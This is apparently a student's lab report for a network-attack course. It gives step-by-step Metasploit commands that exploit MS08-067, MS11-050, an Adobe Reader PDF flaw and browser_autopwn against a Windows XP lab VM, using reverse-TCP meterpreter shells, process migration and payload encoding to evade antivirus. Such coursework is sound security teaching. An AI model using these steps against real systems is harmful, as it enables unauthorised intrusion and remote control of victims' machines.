20145227鄢曼君《網絡對抗》MSF基礎應用
20145227鄢曼君《網絡對抗》MSF基礎應用
主動攻擊:ms08_067漏洞攻擊實踐
- 兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3(英文版)。在VMware中設置兩臺虛擬機網絡爲NAT模式,讓兩臺虛擬機ping通。
- 在kali終端中開啓msfconsole。
- 輸入命令
search ms08_067
,會顯示出找到的滲透模塊:

- 輸入命令
use exploit/windows/smb/ms08_067_netapi
,進入該漏洞模塊的使用。
- 輸入命令
show payloads
會顯示出有效的攻擊載荷,咱們找到一個shell_reverse_tcp。

- 使用命令
set payload generic/shell_reverse_tcp
設置攻擊有效載荷。
- 輸入命令
set LHOST "kali Ip"
set RHOST "Win xp Ip"

- 使用命令
show options
查看payload狀態。


- 在kali上執行
ipconfig/all
獲得以下圖所示:


- 能夠發現兩者結果相同,說明成功攻擊。
- 還能夠進行MS08_067遠程漏洞攻擊實踐:meterpreter
- 前面都和上面的步驟相同。設置payload:set payload windows/meterpreter/reverse_tcp
- 輸入命令
exploit
開始攻擊,攻擊成功。

對瀏覽器攻擊:MS11_050漏洞滲透攻擊實踐
- 兩臺虛擬機相互ping通。
- kali中開啓
msfconsole
。因爲此次作的是ms11_050漏洞攻擊,輸入命令use windows/browser/ms11_050_mshtml_cobjectelement
,使用該模塊;info
便可查看關於該漏洞的信息





- 查看kali,顯示一個session 1已經建立:




Adobe閱讀器滲透攻擊
- kali下打開顯示隱藏文件。
- 在kali終端中開啓
msfconsole
- 輸入命令
use exploit/windows/fileformat/adobe_cooltype_sing
,進入該漏洞模塊的使用。
- 使用命令
set payload windows/meterpreter/reverse_tcp
設置攻擊有效載荷。
- 設置相關數據:

- 使用命令
show options
,看是否設置成功。

- 輸入
exploit
,生成pdf文件,並能夠看到pdf所在文件夾,將pdf複製到靶機裏。

- 使用
back
退出當前模塊,並使用use exploit/multi/handler
新建一個監聽模塊。
- 使用
set payload windows/meterpreter/reverse_tcp
創建一個反向鏈接。注意的是,這裏須要輸入命令set LPORT 5227
和攻擊模塊裏的數據設置爲同樣的。
- 使用命令
exploit
開始攻擊,在xp中打開pdf。攻擊成功結果以下圖:

- 將進程遷移到explorer.exe.使用ps查看當前進程,並找到explorer.exe的進程號,以下圖所示:

- 使用命令
migrate 296
成功後輸入shell,可查看xp靶機信息。還可進行一些操做。

- 在靶機xp中使用命令
netstat -an
,看本地tcp鏈接。發現成功鏈接。

輔助模塊應用:使用瀏覽器滲透攻擊server/browser_autopwn 模塊
- browser_autopwn 是 Metasploit 提供的輔助功能模塊。在用戶訪問 Web 頁面時,它會自動攻擊受害者的瀏覽器。在開始攻擊以前,browser_autopwn 可以檢測用戶使用的瀏覽器類型,根據瀏覽器的檢測結果,自行部署最合適的 exploit。
- 這是針對瀏覽器程序自己的滲透攻擊,主要利用瀏覽器自己的漏洞,如 IE 瀏覽器,常常因爲自身安全漏洞致使攻擊者可以構造惡意網頁進行滲透攻擊。
- 打開終端窗口,啓動msfconsole,選擇
server/browser——autopwn
模塊,配置 LHOST、 SRVHOST 爲主控端 IP,設置 URIPATH 爲 auto
。最後運行run
。

- 以後 metasploit 會自動生成利用瀏覽器自己的一些典型漏洞的網頁,此處生成了 20 個。


- 攻擊成功。查看檢測結果,能夠看到kali向靶機發送了不少數據包,用於檢測該漏洞是否能利用,實際上靶機是打開了不少個網頁,訪問了產生的20個頁面。



問題回答
用本身的話解釋什麼是exploit,payload,encode.
- exploit就至關因而一個運載的工具,將負責攻擊的代碼傳送到靶機中。
- payload也就是負責攻擊的代碼,以前咱們實驗就作過。
- encode也就是編碼,它主要有兩個功能,一是爲了不以前的payload中出現壞字符,二就是它要假裝從而實現免殺,不讓殺毒軟件很輕易的就發現payload是攻擊代碼。
實驗體會
- 此次實驗最大的感覺就是電腦有一個大的內存條是多麼重要。以前作的時候同時開兩個虛擬機電腦卡的要死,作一夜只能作一點點,時間都浪費在等電腦反應上了。後面換了一個大的內存條,實驗就很順暢了。而後此次實驗老師要求至少有一個和別人不同,我以爲這點很是好,讓咱們在作的過程當中能更多的去思考,而不是徹底照着別人的過一遍而不思考。還有一個感覺就是咱們此次實驗攻擊的靶機都是xp系統,漏洞都是很早以前的,要想攻擊如今的電腦可就沒有這麼容易了。有點期待下一週的任務了,又會有什麼不同的呢?
歡迎關注本站公眾號,獲取更多信息